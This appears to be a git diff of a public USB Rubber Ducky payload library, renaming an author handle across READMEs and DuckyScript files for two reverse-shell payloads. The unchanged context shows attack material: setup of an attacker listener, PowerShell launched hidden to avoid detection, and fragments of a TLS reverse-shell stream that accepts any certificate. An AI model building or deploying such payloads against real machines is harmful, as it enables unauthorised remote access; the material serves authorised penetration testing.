REM Fill in Attacker-IP and Port in Line 18
diff --git a/payloads/library/remote_access/ReverseDuckyPolymorph/README.md b/payloads/library/remote_access/ReverseDuckyPolymorph/README.md
index 65fb083..29bf73a 100644
--- a/payloads/library/remote_access/ReverseDuckyPolymorph/README.md
+++ b/payloads/library/remote_access/ReverseDuckyPolymorph/README.md
@@ -1,6 +1,6 @@
**Title: ReverseDuckyPolymorph**
-
Author: 0iphor13, Korben
+
Author: 0i41E, Korben
OS: Windows
Version: 1.1
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum
@@ -17,11 +17,11 @@ Using ReverseDuckyPolymorph is easy and straight forward.
- First, start a listener on your attacking machine via the tool of your choice.
- Second, define the IP-Address and Port of your listening machine
-
+
- Third, compile the payload, using payloadstudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
#
Every session you will gain via this payload will result in a different ID to verify a different pattern.
-
+
Credit for DS 3.0 implentation and ideas:
- Korben
diff --git a/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt b/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt
index a4e0cdd..153c88e 100644
--- a/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt
+++ b/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt
@@ -1,5 +1,5 @@
REM Title: ReverseDuckyPolymorph
-REM Author: 0iphor13, Korben
+REM Author: 0i41E, Korben
REM Version 1.1
REM Target: Windows / Linux(?) (Not tested with Powershell on Linux)
diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/README.md b/payloads/library/remote_access/ReverseDuckyUltimate/README.md
index 610a934..83f9a42 100644
--- a/payloads/library/remote_access/ReverseDuckyUltimate/README.md
+++ b/payloads/library/remote_access/ReverseDuckyUltimate/README.md
@@ -1,6 +1,6 @@
# Title: ReverseDuckyUltimate
-Author: 0iphor13
+
Author: 0i41E
OS: Windows
Version: 1.0
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum
@@ -12,14 +12,14 @@ Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum
#
## Instruction
-Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
+Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
- First: Create key.pem & cert.pem like so:
```
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
```
It will ask for information about the certificate - Insert whatever you want.
-
+
- Second: Start a listener on your attacking machine which supports certificates.
Examples:
@@ -31,25 +31,25 @@ ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem
Additionally add an unique identifier to give your Duck a name.
-
+
- Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
## Instruction - Automatic Setup
- First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use.
-
+
- Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky.
-
+
- Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go!
-
+
#
-
+
Credit for DS 3.0 implentation and ideas:
- Daniel Bohannon
diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
index 683e8f7..6496cb0 100644
--- a/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
+++ b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
@@ -1,7 +1,7 @@
REM ReverseDuckyUltimate
REM Version 1.3
REM OS: Windows / Unix
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed.
@@ -49,10 +49,10 @@ EXTENSION PASSIVE_WINDOWS_DETECT
END_REM
END_EXTENSION
-REM Extension ROLLING_POWERSHELL_EXECUTION by 0iphor13 to obfuscate the start of Powershell
+REM Extension ROLLING_POWERSHELL_EXECUTION by 0i41E to obfuscate the start of Powershell
EXTENSION ROLLING_POWERSHELL_EXECUTION
REM VERSION 1.0
- REM Author: 0iphor13
+ REM Author: 0i41E
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection
@@ -131,7 +131,7 @@ END_EXTENSION
EXTENSION DETECT_FINISHED
REM VERSION 1.0
- REM AUTHOR: 0iphor13
+ REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:
@@ -164,7 +164,7 @@ END_EXTENSION
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
REM_BLOCK
Version: 1.0
- Author: 0iphor13
+ Author: 0i41E
Description: Downgrade the default command prompt of Windows 11 to use Conhost again.
Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
END_REM
@@ -380,7 +380,7 @@ ELSE_DEFINED
Polymorphism2()
STRING .GetStream();
STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));
- STRING $sSL.AuthenticateAsClient('madeby.0iphor13', $null, "Tls12", $false);
+ STRING $sSL.AuthenticateAsClient('madeby.0i41E', $null, "Tls12", $false);
Polymorphism3()
STRING =new-object System.IO.StreamWriter($sSL);
STRING $sSL.write(